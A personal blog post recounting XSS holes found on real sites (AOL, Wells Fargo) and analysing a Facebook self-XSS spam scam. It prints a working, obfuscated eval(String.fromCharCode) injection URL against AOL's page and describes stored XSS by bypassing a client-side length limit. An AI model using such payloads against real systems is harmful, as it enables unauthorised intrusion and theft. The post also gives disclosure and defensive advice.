Heres my video about exploiting cross site scripting attacks in the wild, I found a hole in AOL's promotion page and had my video playing on their domain in less than 5 min

See the attack and video live on the page

or watch below (ill have this link live as long as it works)

The javascript we inject is shown below

which url encodes to...
http://www.aim.com/features/aimandfacebook?aimID=carterkixass%3Cbr%3E%3Cscript%3Eeval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,60,111,98,106,101,99,116,32,119,105,100,116,104,61,52,56,48,32,104,101,105,103,104,116,61,51,56,53,62,60,112,97,114,97,109,32,110,97,109,101,61,39,109,111,118,105,101,39,32,118,97,108,117,101,61,39,104,116,116,112,58,47,47,119,119,119,46,121,111,117,116,117,98,101,46,99,111,109,47,118,47,56,70,119,82,80,48,112,78,83,106,99,63,102,115,61,49,38,97,109,112,59,104,108,61,101,110,95,85,83,38,97,109,112,59,114,101,108,61,48,39,62,60,47,112,97,114,97,109,62,60,101,109,98,101,100,32,115,114,99,61,39,104,116,116,112,58,47,47,119,119,119,46,121,111,117,116,117,98,101,46,99,111,109,47,118,47,56,70,119,82,80,48,112,78,83,106,99,63,102,115,61,49,38,97,109,112,59,104,108,61,101,110,95,85,83,38,97,109,112,59,114,101,108,61,48,39,32,116,121,112,101,61,39,97,112,112,108,105,99,97,116,105,111,110,47,120,45,115,104,111,99,107,119,97,118,101,45,102,108,97,115,104,39,32,119,105,100,116,104,61,52,56,48,32,104,101,105,103,104,116,61,51,56,53,62,60,47,101,109,98,101,100,62,60,47,111,98,106,101,99,116,62,34,41,59))%3C/script%3E

This is a demonstration of a live attack meant for educational purposes only... if you want to see my copy is here: AOL XSS attack landing page If you are having issues with XSS attacks on your domain or would like help on securing your application, contact me id love to help

P.S. the tool I used to do string encoding is here

Update

Ok good news guys... they have removed the page finally! but i reported them like 3 times and there was no "this page is hacking" button... i think its stupid this grew to over a few hundred thousand duped before Facebook found and removed it... i even tweeted to them about this article after i made some javascript to pull the pages likes and update the count dynamically



Facebook needs to have a better way to deal with these kinds of attacks... or at least a way to report them more easily...

Original Post

A friend who i never talk to just sent me to this page on facebook... its the "The Most CRAZIEST & EPIC Facebook Break Up Ever! Absolute MUST SEE!" i usally never trust these things but they had some custom FBML so i wanted to see what was up... after you like the page you get access to the exploit code ive copied below... It gives instructions to paste the code below into address bar. Now i totally thought it was suspect but ive seen things like this do cool easter eggs before so i tried it... then i get a notification "Your invitations have been sent." doh! ive been duped... but i dont feel so bad because they have

150,490 likes

 so im just one of many. now lets see whats going on...

You must view original post to see code...

Now let me just run some carter magic on this and lets see what its doing... first it creates a link on the page, then simulates a mouse event to that link... there are then 3 function set on timers to hide the dialog, select all contacts, submit the form and then replace the container with a iframe serving spam...

i gotta admit pretty well done... get the users to run the exploit for you and because facebook makes it so hard to report hackers i bet i have infected many of my friends and have no way of stopping or recovering the notifications. I looked everywhere and i cant find any way to see a log of what ive sent and how i can recover those messages

Lame Facebook Lame!

I like to dabble in security... xss holes are fast and easy. The first one i ever found was on the online editor Aviary when i was a beta tester... it was a small one. They had scrubbed html in every field (.net had done it for them) but they had forgotten to sanitize the input from the filename in their flash app and i got my tags in! woohoo XSS holes. I happen to be checking my Wells Fargo account and you can nickname your accounts... and i thought to my self. self i wonder if i could put some html in my account nickname and have it render... lets try it :)

and

We got tags

but i was dealing with a character limit... a common problem with cross site scripting attacks but no matter i decided to try for the long shot... i used chrome to change the max length of the text field to something i could really put some code in fully not expecting it to work and then boom i got an entire script tag with a javascript alert... and its persistent!

how i changed the max length of the text field:the next morning i tried to find the correct people to call and got to the phishing department but not the real web guys... then i was really impressed... i got a call from their online fraud department they had detected that html was being posted from my account and I quickly offered up that it was me who was inserting the HTML and told them about the hole (this was months ago and im sure they fixed the hole by now so i dont think im hurting anything by posting this im sure i will know if they think otherwise) but anyways the cool part is that even though they weren't aware of the hole their system detected the XSS anyways... way cool and props to you security guys at wells fargo! i was asked not to try and attack the account portal anymore (so i wouldn't set off alarms again) and was thanked for letting them know about the hole... it was a small one but some javascript left by an attacker to send balance to remote server and then steal cookies (im sure stealing cookies wouldn't work but for the sake of this argument) if there was a large enough balance alert the attackers. also because it is a persistent attack and html doesn't render on the screen the script could sit there for a long time without the user ever knowing

so how do you protect the applications you write from XSS attacks? the answer is simple... its the same as protecting against SQL injection... sanitize all user input before anything is written to the screen. Strip html with regular expressions is always a good start and for god sakes please force character limits at the server side and dont expect the HTML maxlength="20" to do your job for you

below is my javascript alert with the cross site scripting hole in wellsfargo.com. those guys do a great job and ive been a customer for like 7 years. Wells Fargo is awesome and i hope they dont make me take this down because it is a great example of this attack and they did catch it so there really wasn't that bad of a security problem...
id love to hear your questions / comments / concerns about this article, bother me on twitter im @cartercole and i love to answer any of your questions...